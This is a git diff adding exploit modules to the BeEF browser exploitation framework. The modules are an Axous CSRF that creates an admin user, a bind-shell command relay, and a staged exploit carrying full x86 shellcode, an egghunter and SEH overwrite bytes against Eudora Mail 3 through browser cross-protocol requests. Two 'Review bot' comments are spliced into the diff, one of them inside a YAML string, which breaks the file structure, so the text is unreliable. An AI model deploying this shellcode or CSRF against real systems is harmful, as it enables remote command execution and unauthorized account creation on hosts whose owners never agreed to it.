@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var repeat_value = "<%= @repeat_string %>"; diff --git a/modules/debug/test_return_long_string/config.yaml b/modules/debug/test_return_long_string/config.yaml index c44d85390..0bbafff83 100644 --- a/modules/debug/test_return_long_string/config.yaml +++ b/modules/debug/test_return_long_string/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/debug/test_return_long_string/module.rb b/modules/debug/test_return_long_string/module.rb index 4e1edc68f..f637fc511 100644 --- a/modules/debug/test_return_long_string/module.rb +++ b/modules/debug/test_return_long_string/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Test_return_long_string < BeEF::Core::Command diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/command.js b/modules/exploits/axous_1_1_1_add_user_csrf/command.js new file mode 100644 index 000000000..6c4c84a03 --- /dev/null +++ b/modules/exploits/axous_1_1_1_add_user_csrf/command.js 
@@ -0,0 +1,31 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var base = '<%= @base %>'; + var username = '<%= @username %>'; + var password = '<%= @password %>'; + var email = '<%= @email %>'; + + var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", [ + {'type':'hidden', 'name':'user_name', 'value':username}, + {'type':'hidden', 'name':'new_passwd', 'value':password}, + {'type':'hidden', 'name':'new_passwd1', 'value':password}, + {'type':'hidden', 'name':'email', 'value':email}, + {'type':'hidden', 'name':'dosubmit', 'value':'1'} , + {'type':'hidden', 'name':'id', 'value':''}, + {'type':'hidden', 'name':'action', 'value':'addnew'} , + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(axous_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml new file mode 100644 index 000000000..94f2d4549 --- /dev/null +++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + axous_add_user_csrf: + enable: true + category: "Exploits" + name: "Axous <= 1.1.1 Add User CSRF" + description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)." + authors: ["bcoles", "Ivano Binetti"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb new file mode 100644 index 000000000..587af0530 --- /dev/null 
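Review bot: In axous_1_1_1_add_user_csrf/command.js, `cleanup = function() {...}` is assigned without `var` and then run through the string form `setTimeout("cleanup()", 15000)`, which creates a global on the host page and evaluates a string where a function reference would do. Passing the function directly keeps it local: `setTimeout(function() { document.body.removeChild(axous_iframe); }, 15000);`. The beef_bind_shell command.js added later in this commit has the same shape: `xhr`, `strip_output`, `get_prompt`, `send_command` and `get_additional_cmd_results` are all assigned without a declaration, and `setTimeout("get_additional_cmd_results()",500)` is string-evaluated. There the single undeclared `xhr` is overwritten by each function, so it should at least be declared with `var` inside each one.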
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Axous_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'Axous URL', 'value' => 'http://target/admin/administrators_add.php'}, + { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'}, + { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'}, + { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js new file mode 100755 index 000000000..f4a0fc902 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_shell/command.js 
@@ -0,0 +1,86 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function () { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var path = '<%= @path %>'; + var cmd = '<%= @cmd %>'; + + var uri = "http://" + rhost + ":" + rport + path; + + strip_output = function(output){ + + var offset = 0; + for(var c in output){ + c = output.charAt(c); + if(c.charCodeAt(0) == 0){ + break; + } + offset++; + } + return output.substring(0,offset); + }; + + var counter = 0; + get_additional_cmd_results = function(){ + xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function(){ + if(xhr.readyState == 4){ + var result = strip_output(xhr.responseText); + console.log("result.length: " + result.length); + if(result.length != 0){ + console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result); + beef.net.send("<%= @command_url %>", <%= @command_id %>, result); + counter++; + setTimeout("get_additional_cmd_results()",500); + } + }else{ // No more command results, ready to send another command. 
+ console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]"); + } + }; + xhr.open("GET", uri, false); + xhr.send(null); + }; + + get_prompt = function () { + + xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function(){ + if(xhr.readyState == 4){ + console.log("get_prompt: Retrieved prompt"); + var prompt = strip_output(xhr.responseText); + console.log(prompt); + beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt); + + //send command + send_command(cmd); + } + }; + xhr.open("GET", uri, false); + xhr.send(null); + }; + + send_command = function(command){ + xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function(){ + var cmd_result = strip_output(xhr.responseText); + console.log(cmd_result); + beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result); + }; + xhr.open("POST", uri, false); + xhr.setRequestHeader("Content-Type", "text/plain"); + command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?" + xhr.send(command); + setTimeout("get_additional_cmd_results()",500); + }; + + + +get_prompt(); + +}); + diff --git a/modules/exploits/beefbind/beef_bind_shell/config.yaml b/modules/exploits/beefbind/beef_bind_shell/config.yaml new file mode 100755 index 000000000..2aa33ea98 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_shell/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + BeEF_bind_shell: + enable: true + category: ["Exploits", "BeEF_bind"] + name: "BeEF bind shell" + description: "Send commands to be executed on the already deployed BeEF_bind shellcode, and get results back." + authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller + target: + working: ["FF", "C", "S"] 
diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb new file mode 100755 index 000000000..c111a2016 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_shell/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Beef_bind_shell < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'}, + { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'}, + { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'}, + { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js new file mode 100755 index 000000000..850858d5a --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js 
@@ -0,0 +1,387 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function () { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var service_port = '<%= @service_port %>'; + var path = '<%= @path %>'; + var delay = parseInt('<%= @delay %>'); + + var beef_host = '<%= @beef_host %>'; + var beef_port = '<%= @beef_port %>'; + var beef_junk_port = '<%= @beef_junk_port %>'; + var sock_name = '<%= @beef_junk_socket %>'; + + //todo: this will be obviously dynamic as soon as we'll have more IPEC exploits. + var available_space = 769; + + // base64 decode function that works properly with binary data (like shellcode) + var Base64Binary = { + _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", + + decode:function (input) { + //get last chars to see if are valid + var lkey1 = this._keyStr.indexOf(input.charAt(input.length - 1)); + var lkey2 = this._keyStr.indexOf(input.charAt(input.length - 1)); + + var bytes = Math.ceil((3 * input.length) / 4.0); + /** + if (lkey1 == 64) bytes--; //padding chars, so skip + if (lkey2 == 64) bytes--; //padding chars, so skip + **/ + + var uarray = []; + var chr1, chr2, chr3; + var enc1, enc2, enc3, enc4; + var i = 0; + var j = 0; + + input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); + + for (i = 0; i < bytes; i += 3) { + //get the 3 octects in 4 ascii chars + enc1 = this._keyStr.indexOf(input.charAt(j++)); + enc2 = this._keyStr.indexOf(input.charAt(j++)); + enc3 = this._keyStr.indexOf(input.charAt(j++)); + enc4 = this._keyStr.indexOf(input.charAt(j++)); + + chr1 = (enc1 << 2) | (enc2 >> 4); + chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); + chr3 = ((enc3 & 3) << 6) | enc4; + + uarray.push(chr1 & 0xff); + if (enc3 != 64) uarray.push(chr2 & 0xff); + if (enc4 != 64) uarray.push(chr3 & 0xff); + } + return uarray; + } + }; + + + /* + * Ty's goodness. 
Slightly modified BeEF bind stager to work with the + * Egg Hunter. + * + * Original size: 299 bytes + * Final size: 326 bytes + * BadChars removed: \x00\x0a\x0d\x20\x7b + */ + var stager = "B33FB33F" + + "\xba\x6a\x99\xf8\x25\xd9\xcc\xd9\x74\x24\xf4\x5e\x31\xc9" + + "\xb1\x4b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x9f\x65" + + "\x10\xac\x5f\x96\xe1\xcf\xd6\x73\xd0\xdd\x8c\xf0\x41\xd2" + + "\xc7\x55\x6a\x99\x85\x4d\xf9\xef\x01\x61\x4a\x45\x77\x4c" + + "\x4b\x6b\xb7\x02\x8f\xed\x4b\x59\xdc\xcd\x72\x92\x11\x0f" + + "\xb3\xcf\xda\x5d\x6c\x9b\x49\x72\x19\xd9\x51\x73\xcd\x55" + + "\xe9\x0b\x68\xa9\x9e\xa1\x73\xfa\x0f\xbd\x3b\xe2\x24\x99" + + "\x9b\x13\xe8\xf9\xe7\x5a\x85\xca\x9c\x5c\x4f\x03\x5d\x6f" + + "\xaf\xc8\x60\x5f\x22\x10\xa5\x58\xdd\x67\xdd\x9a\x60\x70" + + "\x26\xe0\xbe\xf5\xba\x42\x34\xad\x1e\x72\x99\x28\xd5\x78" + + "\x56\x3e\xb1\x9c\x69\x93\xca\x99\xe2\x12\x1c\x28\xb0\x30" + + "\xb8\x70\x62\x58\x99\xdc\xc5\x65\xf9\xb9\xba\xc3\x72\x2b" + + "\xae\x72\xd9\x24\x03\x49\xe1\xb4\x0b\xda\x92\x86\x94\x70" + + "\x3c\xab\x5d\x5f\xbb\xcc\x77\x27\x53\x33\x78\x58\x7a\xf0" + + "\x2c\x08\x14\xd1\x4c\xc3\xe4\xde\x98\x44\xb4\x70\x73\x25" + + "\x64\x31\x23\xcd\x6e\xbe\x1c\xed\x91\x14\x35\xdf\xb6\xc4" + + "\x52\x22\x48\xfa\xfe\xab\xae\x96\xee\xfd\x79\x0f\xcd\xd9" + + "\xb2\xa8\x2e\x08\xef\x61\xb9\x04\xe6\xb6\xc6\x94\x2d\x95" + + "\x6b\x3c\xa5\x6e\x60\xf9\xd4\x70\xad\xa9\x81\xe7\x3b\x38" + + "\xe0\x96\x3c\x11\x41\x58\xd3\x9a\xb5\x33\x93\xc9\xe6\xa9" + + "\x13\x86\x50\x8a\x47\xb3\x9f\x07\xee\xfd\x35\xa8\xa2\x51" + + "\x9e\xc0\x46\x8b\xe8\x4e\xb8\xfe\xbf\x18\x80\x97\xb8\x8b" + + "\xf3\x4d\x47\x15\x6f\x03\x23\x57\x1b\xd8\xed\x4c\x16\x5d" + + "\x37\x96\x26\x84"; + + /* + * Ty's goodness. Original BeEF bind stage. 
+ * + * Original size: 792 bytes + */ + var stage_allow_origin = + "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" + + "\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52" + + "\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" + + "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38" + + "\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58" + + "\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a" + + "\x8b\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5" + + "\x89\xc6\x68\x01\x00\x00\x00\x68\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68\x00\x00\x00\x00\x89" + + "\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c\x24\x0c\x57\x53\x51\x68\x3e\xcf" + + "\xaf\x0e\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00" + + "\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68\x00\x00\x00\x00" + + "\x68\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24\x04\x68\x00\x00\x00\x00\x68" + + "\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" + + "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" + + "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79" + + "\xcc\x3f\x86\xff\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d" + + "\xbe\x18\x04\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20" + + "\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74\x2f" + + "\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c" + + 
"\x6c\x6f\x77\x2d\x4f\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" + + "\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x31\x36\x0d\x0a\x0d\x0a\x5e\xb9\x62\x00\x00\x00\xf3" + + "\xa4\x5e\x56\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90" + + "\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" + + "\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" + + "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff" + + "\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00\x5e\x89\x3e\x6a\x00\x68\x00" + + "\x04\x00\x00\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" + + "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb\xf2\x81\xc3" + + "\x03\x00\x00\x00\x43\x53\x68\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00\x57\x68\x01\x00\x00\x00" + + "\x53\x8b\x5c\x24\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00" + + "\x00\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24\x74\x8b" + + "\x1b\x53\x68\x18\xb7\x3c\xb3\xff\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0\x74\x3d\x68\x00\x00" + + "\x00\x00\x8d\xbe\x14\x04\x00\x00\x57\x68\x86\x0b\x00\x00\x8d\xbe\x7a\x04\x00\x00\x57\x8d\x5c" + + "\x24\x70\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18\x04" + + "\x00\x00\x57\xff\x36\x68\xc2\xeb\x38\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52\xff\xd5\xe9\x38" + + "\xfe\xff\xff"; + + // Skape's NtDisplayString egghunter technique, 32 bytes -> see also string T00W inside + /* + * Egg Hunter (Skape's NtDisplayString technique). 
+ * Original size: 32 bytes + * + * Next SEH and SEH pointers + * Size: 8 bytes + */ + var egg_hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" + + "\xef\xb8\x42\x33\x33\x46\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"; + var next_seh = "\xeb\x06\x90\x90"; + var seh = "\x4e\x3b\x01\x10"; + + + gen_nops = function(count){ + var i = 0; + var result = ""; + while(i < count ){ result += "\x90";i++;} + log("gen_nops: generated " + result.length + " nops."); + return result; + }; + + /* + * send_stager_back(): + * In order to properly calculate the exact size of the cross-domain request headers, + * we send a bogus request back to BeEF (different port, so still cross-domain). + * + * get_junk_size(): + * Then we retrieve the total size of the HTTP headers, as well as other specific headers like 'Host' + * + * calc_junk_size(): + * Calculate the differences with the request that will be sent to the target, for example: + * "Host: 172.16.67.1:2000\r\n" //24 bytes + * "Host: 172.16.67.135:143\r\n" //25 bytes + */ + send_stager_back = function(){ + var uri = "http://" + beef_host + ":" + beef_junk_port + "/"; + var xhr = new XMLHttpRequest(); + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + xhr.setRequestHeader('Accept','*/*'); + xhr.setRequestHeader("Accept-Language", "en"); + xhr.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); + log("send_stager_back: sending back the stager to calculate headers size"); + }; + + var timeout_counter = 0; + var timeout = 10; + var size,host,contenttype,referer,nops = null; + get_junk_size = function(){ + var junk_name = ""; + var uri = "http://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name; + + $j.ajax({ + type: "GET", + url: uri, + dataType: "json", + success: function(data, textStatus, xhr){ + size = data.size; + host = data.host; + contenttype = data.contenttype; + referer = 
data.referer; + + //todo to it better + nops = data.nops; + + log("get_junk_size: OK - size [" + size + "] - host [" + + host + "] - contenttype [" + contenttype + "] - referer [" + referer + "]"); + }, + error: function(jqXHR, textStatus, errorThrown){ + timeout_counter++; + // re-tries for 10 times (10 seconds) + if (timeout_counter < timeout) { + log("get_junk_size: ERROR - no data yet. re-trying."); + setTimeout(function() {get_junk_size()},1000); + }else{ + log("get_junk_size: ERROR - timeout reached. giving up."); + } + } + }); + + }; + + var final_junk_size = null; + calc_junk_size = function(){ + + final_junk_size = size; + // 8 -> Host: \r\n + var new_host = (rhost+":"+service_port).length + 8; + if(new_host != host){ + + if(new_host > host){ + var diff = new_host - host; + final_junk_size += diff; + }else{ + var diff = host - new_host; + final_junk_size -= diff; + } + } + log("get_junk_size: final_junk_size -> [" + final_junk_size + "]"); + + //content-type "; charset=UTF-8" will not be present at the end, in the new request - we save 15 bytes + if(contenttype > 26) + final_junk_size -= 15; + + // referrer should be the same + // we can also override the UserAgent (deliovering the Firefox Extension). We can then save 90 bytes or more. + log("get_junk_size: final_junk_size -> [" + final_junk_size + "]"); + }; + + var stager_successfull = false; + send_stager = function(){ + + try{ + xhr = new XMLHttpRequest(); + var uri = "http://" + rhost + ":" + service_port + path; + log("send_stager: URI " + uri); + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + + //todo: if for some reasons the headers are too big (bigger than 425 bytes), + // a warning should be displayed, because the exploit will not work, given the + // space for the shellcode that we have. + // The likelihood of this can be minimized thanks to the Firefox Extension we deliver + // to disable PortBanning. 
We are also overriding the UserAgent, so we save up to 100 bytes of space. + + var junk = available_space - stager.length - final_junk_size; // 22 bytes + var junk_data = gen_nops(junk); + + var payload = junk_data + stager + next_seh + seh + egg_hunter; + var decoded_payload = Base64Binary.decode(btoa(payload)); + + var c = ""; + for (var i = 0; i < decoded_payload.length; i++) { + c += String.fromCharCode(decoded_payload[i] & 0xff); + } + + //needed to have the service replying before sending the actual exploit + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + xhr.setRequestHeader('Accept','*/*'); + xhr.setRequestHeader("Accept-Language", "en"); + xhr.send("a001 LIST \r\n"); + // / needed to have the service replying before sending the actual exploit + + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + xhr.setRequestHeader('Accept','*/*'); + xhr.setRequestHeader("Accept-Language", "en"); + + var post_body = "a001 LIST " + "}" + c + "}" + "\r\n"; + + log("send_stager: Final body length [" + post_body.length + "]"); + + // this is required only with WebKit browsers. + if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { + console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); + XMLHttpRequest.prototype.sendAsBinary = function(datastr) { + function byteValue(x) { + return x.charCodeAt(0) & 0xff; + } + var ords = Array.prototype.map.call(datastr, byteValue); + var ui8a = new Uint8Array(ords); + this.send(ui8a.buffer); + } + } + + xhr.sendAsBinary(post_body); + log("send_stager: stager sent."); + stager_successfull = true; + }catch(exception){ + console.log("!!! 
Exception: " + exception); + // Check for PortBanning exceptions: + //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited + if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){ + // not exactly needed but just in case + stager_successfull = false; + log("Error: NS_ERROR_PORT_ACCESS_NOT_ALLOWED. Looks like PortBanning for port [" + service_port + "] is still enabled!"); + } + } + + }; + + deploy_stage = function () { + if(stager_successfull){ + // As soon as the stage is running, the HTTP responses will contain Access-Control-Allow-Origin: * + // so we can communicate with CORS normally. + var decoded_shellcode = Base64Binary.decode(btoa(stage_allow_origin)); + var c = ""; + for (var i = 0; i < decoded_shellcode.length; i++) { + c += String.fromCharCode(decoded_shellcode[i] & 0xff); + } + var post_body = "cmd=" + c; + var uri = "http://" + rhost + ":" + rport + path; + + xhr = new XMLHttpRequest(); + console.log("uri: " + uri); + xhr.open("POST", uri, true); + xhr.setRequestHeader("Content-Type", "text/plain"); + + // this is required only with WebKit browsers. 
+ if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { + console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); + XMLHttpRequest.prototype.sendAsBinary = function(datastr) { + function byteValue(x) { + return x.charCodeAt(0) & 0xff; + } + var ords = Array.prototype.map.call(datastr, byteValue); + var ui8a = new Uint8Array(ords); + this.send(ui8a.buffer); + } + } + + xhr.sendAsBinary(post_body); + log("deploy_stage: stage sent.\r\n You should be now able to use beef_bind_shell module to send commands."); + }else{ + log("Skipping Stage delivery because Stager failed."); + } + + }; + + log = function(data){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, data); + console.log(data); + }; + + +/* +* To calculate exact HTTP header size we send a request back to BeEF, on a different socket, to maintain +* the cross-domain behavior. +*/ +send_stager_back(); + +/* +* Deliver Stager and Stage. +* +* The following timeouts should be enough with normal DSL lines. +* Increase delay value for slower clients. +*/ +setTimeout("get_junk_size()", delay/2); +setTimeout("calc_junk_size()", delay); +setTimeout("send_stager()", 2000 + delay); +setTimeout("deploy_stage()", 6000 + delay); + +}); + diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml new file mode 100755 index 000000000..d824aefc0 --- /dev/null +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + BeEF_bind_staged_deploy: + enable: true + category: ["Exploits", "BeEF_bind"] + name: "BeEF bind" + description: "Pwn internal services with a custom staging shellcode. Both the stager and the stage are delivered.
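Review bot: `send_stager` never checks that the header measurement succeeded, because the four `setTimeout` calls at the end of the file fire on fixed delays while `get_junk_size` may still be retrying or may have given up. In that case `size` is still undefined (`var size,host,contenttype,referer,nops = null;` initialises only `nops`), `calc_junk_size` turns `final_junk_size` into NaN, `gen_nops(NaN)` returns an empty string, and the request is sent to `rhost` anyway. The function should fail closed, for example with `if (typeof final_junk_size != 'number' || isNaN(final_junk_size)) { log("send_stager: header size unknown, aborting."); return; }` as the first statement inside the `try`. Separately, both log lines in `calc_junk_size` are prefixed `get_junk_size:`, which makes the output hard to attribute.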
Right now only Eudora Mail 3 (v. v6.1.19.0) on Windows (POP ECX mailcmn.dll) can be exploited: SEH exploit with EggHunter.
